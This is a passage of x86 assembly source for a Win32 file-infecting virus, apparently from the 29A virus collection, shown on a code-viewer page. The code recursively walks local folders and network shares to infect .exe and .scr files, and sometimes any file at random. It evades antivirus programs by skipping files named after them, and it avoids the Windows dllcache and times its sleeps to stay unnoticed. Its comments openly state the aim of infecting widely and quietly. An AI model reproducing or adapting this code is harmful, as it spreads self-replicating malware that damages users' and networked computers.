📄 29a-7.007
字号:
call enum_path_1
db 'rary Inter',0
enum_path_1:
pop edi
mov ebx,esi
push esi ;ESI must be protected because SUBCALL will destroy it.
SUBCALL str_instr,enum_path_ip
pop esi
jz short enum_next_file_jmpz
;Don't infect files in dllcache
push esi
SUBCALL is_in_dllcache,enum_path_ip
pop esi
enum_next_file_jmpz:
jz short enum_next_file
mov ecx,MAX_DIR_SIZE
sub esp,ecx
mov edi,esp
rep movsb
call enum_path ;recursion infect path
add esp,MAX_DIR_SIZE ;clear stack frame
enum_next_file_jmp1:
jmp short enum_next_file
enum_do_fop:
;Check AV file
not eax
call eax_to_lowcase
lea edi,[ebp+av_name-enum_path_ip]
push large av_name_num
pop ecx
repnz scasd
jz short enum_next_file_jmp1
and eax,00ffffffh
cmp eax,'0pva' and 00ffffffh ;avp
jz short enum_next_file_jmp1
cmp eax,'0van' and 00ffffffh ;nav
jz short enum_next_file_jmp1
mov edi,esi
;For quick and quiet infection,I'd better check the file extension
;But for infect widely,I have 1/4 chance to infect any file without check its extension.
call find_str_tail
mov eax,[edi-4]
call eax_to_lowcase
cmp eax,'exe.'
jz short enum_do_fop_1
cmp eax,'rcs.'
jz short enum_do_fop_1
test byte ptr [ebp+callsub_seed-enum_path_ip],3
enum_next_file_jmpnz:
jnz short enum_next_file
enum_do_fop_1:
mov edi,esi
SUBCALL file_operate,enum_path_ip
enum_next_file:
call have_a_sleep
lea eax,[esp+4] ;WIN32_FIND_DATA
mov ecx,[esp] ;find file handle
push eax
push ecx
call [ebp+addrFindNextFileA-enum_path_ip]
or eax,eax
jnz found_one_file
infect_one_path_close:
;Now esp->find file handle
call [ebp+addrFindClose-enum_path_ip]
enum_path_ok:
add esp,size WIN32_FIND_DATA ;clear stack frame
popad
retn
enum_path_end:
av_name equ this dword
dd 'pva_' ;_avp
dd 'rela' ;aler
dd 'noma' ;amon
dd 'itna' ;anti
dd '3don' ;nod3
dd 'sspn' ;npss
dd 'sern' ;nres
dd 'hcsn' ;nsch
dd 's23n' ;n32s
dd 'iwva' ;avwi
dd 'nacs' ;scan
dd 'ts-f' ;f-st
dd 'rp-f' ;f-pr
av_name_num equ ($-av_name)/4
enum_net:
enum_net_ip equ main_thread_ip
pushad
mov ebx,4*3+MAX_NETRESOURCE_NUM*8*4-4
mov ecx,1000h
probpage_loop:
sub ebx,ecx
jb short probpage_end
sub esp,ecx
push ecx
pop ecx
jmp short probpage_loop
probpage_end:
add ebx,ecx
sub esp,ebx
;Stack map
;esp->enumeration handle
;esp+4->number of entries=-1
;esp+8->buffer size=MAX_NETRESOURCE_NUM*8*4
;esp+0ch->buffer
push large 0
mov ecx,[ebp+addrWNetOpenEnumA-enum_net_ip]
jecxz enum_net_ret_jmp
push esp
push eax
push large RESOURCEUSAGE_ALL
push large RESOURCETYPE_DISK
push large RESOURCE_GLOBALNET
call ecx
or eax,eax
jnz short enum_net_ret_jmpnz
mov ecx,[ebp+addrWNetEnumResourceA-enum_net_ip]
enum_net_ret_jmp:
jecxz enum_net_ret_jmp2
mov esi,[esp] ;esi=enumeration handle
lea edi,[esp+8] ;edi->buffer size
mov dword ptr [edi],MAX_NETRESOURCE_NUM*8*4
push edi
lea edi,[esp+0ch+4] ;edi->buffer
push edi
lea edi,[esp+4+4*2] ;edi->number of entries
dec eax
mov dword ptr [edi],eax
push edi
push esi
call ecx
or eax,eax
enum_net_ret_jmpnz:
jnz short enum_net_ret
mov ecx,[edi]
enum_net_ret_jmp2:
jecxz enum_net_ret
enum_net_loop:
lea edx,[ecx*4]
test dword ptr [esp+edx*8+0ch-8*4+4*3],RESOURCEUSAGE_CONTAINER ;dwUsage is RESOURCEUSAGE_CONTAINER?
jz short not_container ;no
lea eax,[esp+edx*8-8*4+0ch]
call enum_net ;recurse infect the container
jmp short enum_net_loop_next
not_container:
mov esi,[esp+edx*8+0ch-8*4+4*5] ;esi=lpRemoteName
or esi,esi
jz short enum_net_loop_next
mov edi,esi
call find_str_tail
mov eax,[edi-2]
call eax_to_lowcase
and eax,00ffffffh
cmp eax,'00a\' and 0000ffffh ;is '\a'?If so,maybe floppy,don't infect it
jz short enum_net_loop_next
cmp eax,'00b\' and 0000ffffh ;is '\b'?If so,maybe floppy,don't infect it
jz short enum_net_loop_next
sub esp,MAX_DIR_SIZE
mov edi,esp
;OUTSTRING3 esi,enum_net_ip
enum_net_1:
lodsb
stosb
or al,al
jnz short enum_net_1 ;copy remote name
call enum_path
add esp,MAX_DIR_SIZE
enum_net_loop_next:
loop enum_net_loop
enum_net_ret:
;esp->enumeration handle
pop eax
mov ecx,[ebp+addrWNetCloseEnum-enum_net_ip]
jecxz enum_net_ret_1
or eax,eax
jz enum_net_ret_1
push eax
call ecx
enum_net_ret_1:
add esp,4*3+MAX_NETRESOURCE_NUM*8*4-4
popad
ret
enum_net_end:
goto_enum_proc:
pushad
pushfd
call goto_enum_proc_ip
goto_enum_proc_ip:
pop ebp
;Can't infect process too frequently,if so,some program will corrupt when they start.
call [ebp+addrGetTickCount-goto_enum_proc_ip]
mov ebx,12345678h
goto_enum_proc_pretime equ $-4
mov ecx,eax
sub ecx,ebx
cmp ecx,1000*60 ;Only more than every one minute to infect process
jc short goto_enum_proc_1
mov [ebp+goto_enum_proc_pretime-goto_enum_proc_ip],eax
SUBCALL enum_proc,goto_enum_proc_ip
goto_enum_proc_1:
popfd
popad
retn
have_a_sleep:
pushad
call have_a_sleep_ip
have_a_sleep_ip:
pop ebp
mov edi,[ebp+addrGetTickCount-have_a_sleep_ip]
call edi
mov ebx,12345678h
have_a_sleep_pretime equ $-4
sub eax,ebx
mov ebx,500 ;If isn't quick sleep,continue run for 500 millisecond
push large 50 ;Sleep for 50 seconds
pop esi
mov ecx,[ebp+quick_sleep-have_a_sleep_ip]
jecxz have_a_sleep_1 ;Not quick sleep
mov ebx,3000 ;If is quick sleep,continue run for 3000 millisecond
push large 20 ;Sleep for 20 seconds
pop esi
have_a_sleep_1:
cmp eax,ebx
jc short have_a_sleep_ret
shl esi,10
push esi
call [ebp+addrSleep-have_a_sleep_ip]
call edi
mov [ebp+have_a_sleep_pretime-have_a_sleep_ip],eax
call test_quick_sleep
call goto_enum_proc
have_a_sleep_ret:
popad
retn
have_a_sleep_end:
;in--ebp->have_a_sleep_ip
test_quick_sleep:
test_qs_ip equ have_a_sleep_ip
call test_qs_1
db MUTEX_NAME
test_qs_1:
pop edi
push edi
push large 0
push large FILE_MAP_WRITE
call [ebp+addrOpenFileMappingA-test_qs_ip]
or eax,eax
jz short test_qs_2
push eax
call [ebp+addrCloseHandle-test_qs_ip]
retn
test_qs_2:
inc eax
SUBCALL create_mem_map,test_qs_ip
jz short test_qs_3
mov [ebp+quick_sleep-test_qs_ip],eax
push eax
call [ebp+addrUnmapViewOfFile-test_qs_ip]
test_qs_3:
retn
test_quick_sleep_end:
copy_path:
;in--esi->path,ebp->enum_path_ip
;on return,edi->pathname_buf
mov ecx,MAX_DIR_SIZE
lea edi,[ebp+pathname_buf-enum_path_ip]
push edi
rep movsb
pop edi
ret
find_str_tail:
;edi->string,on return,edi->0
push eax
push ecx
xor eax,eax
mov ch,0ffh
repnz scasb
dec edi
pop ecx
pop eax
ret
eax_to_lowcase:
push ecx
push large 4
pop ecx
eax_to_lowcase_0:
cmp al,'A'
jc eax_to_lowcase_1
cmp al,'Z'
ja eax_to_lowcase_1
add al,'a'-'A'
eax_to_lowcase_1:
ror eax,8
loop eax_to_lowcase_0
pop ecx
retn
main_thread_end:
;in--ebx->string,edi->sub string to find
;out--ZF set means is in string,ZF cleared means not in
CALLHEADER str_instr
str_instr:
pushad
call str_instr_ip
str_instr_ip:
pop ebp
cld
mov al,38h
mov ebp,[ebp+addrlstrcmpiA-str_instr_ip]
or ebp,ebp
jz short str_instr_ret
dec ebx
str_instr_1:
inc ebx
call str_len
mov esi,ecx ;ebx=sub string len
xchg ebx,edi
call str_len ;ecx=source string len
xchg ebx,edi
push large 38h
pop eax
cmp esi,ecx
ja short str_instr_ret
mov dl,[ebx+esi]
push edx
push ebx
mov byte ptr [ebx+esi],0
push ebx
push edi
call ebp
or eax,eax
pop ebx
pop edx
mov [ebx+esi],dl
jnz short str_instr_1
str_instr_ret:
or eax,eax
popad
retn
;in--edi->string
;out--ecx=string length
str_len:
push edi
xor al,al
xor ecx,ecx
dec ecx
repnz scasb
pop edi
not ecx
dec ecx
retn
str_len_end:
str_instr_end:
;in--ebx->full path
;out--ZF set is in,ZF cleared,not in
CALLHEADER is_in_dllcache
is_in_dllcache:
pushad
call is_in_dllcache_ip
is_in_dllcache_ip:
pop ebp
call is_in_dllcache_1
db 'tem32\dllcac',0
is_in_dllcache_1:
pop edi
SUBCALL str_instr,is_in_dllcache_ip
popad
retn
is_in_dllcache_end:
;Out--edx=random
CALLHEADER get_rand
get_rand:
pushad
call get_rand_ip
get_rand_ip:
pop ebp
call [ebp+addrGetTickCount-get_rand_ip]
mov ecx,12345678h
rand_seed equ $-4
add eax,ecx
rol ecx,1
add ecx,esp
add [ebp+rand_seed-get_rand_ip],ecx
push large 32
pop ecx
get_rand_1:
shr eax,1
jnc get_rand_2
xor eax,HASH16FACTOR
get_rand_2:
loop get_rand_1
mov [esp+5*4],eax
mov [ebp+callsub_seed-get_rand_ip],ax
popad
retn
get_rand_end:
CALLHEADER get_extra_proc
get_extra_proc:
pushad
call get_extra_proc_ip
get_extra_proc_ip:
pop ebp
lea edi,[ebp+sfc_hash_table-8-get_extra_proc_ip]
push large 1
get_extra_proc_0:
push edi
call [ebp+addrLoadLibraryA-get_extra_proc_ip]
or eax,eax
jz short get_extra_proc_1
mov ebx,eax
sub ebx,10000h
SUBCALL search_api_addr,get_extra_proc_ip
get_extra_proc_1:
pop ecx
jecxz get_extra_proc_2
dec ecx
push ecx
lea edi,[ebp+mpr_hash_table-8-get_extra_proc_ip]
jmp short get_extra_proc_0
get_extra_proc_2:
call get_extra_proc_3
db 'user32',0
get_extra_proc_3:
call [ebp+addrLoadLibraryA-get_extra_proc_ip]
or eax,eax
jz short get_extra_proc_4
mov ebx,eax
sub ebx,10000h
lea edi,[ebp+user32_hash_table-8-get_extra_proc_ip]
SUBCALL search_api_addr,get_extra_proc_ip
get_extra_proc_4:
popad
retn
get_extra_proc_end:
;*******************************mainthrd.asm end*****************************
;code and initialized data end here
vir_size equ $-_start
;Uninitialized data
ftime db 3*8 dup(0)
is9x dd 0
quick_sleep dd 0
infbuffer db vir_size+1⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -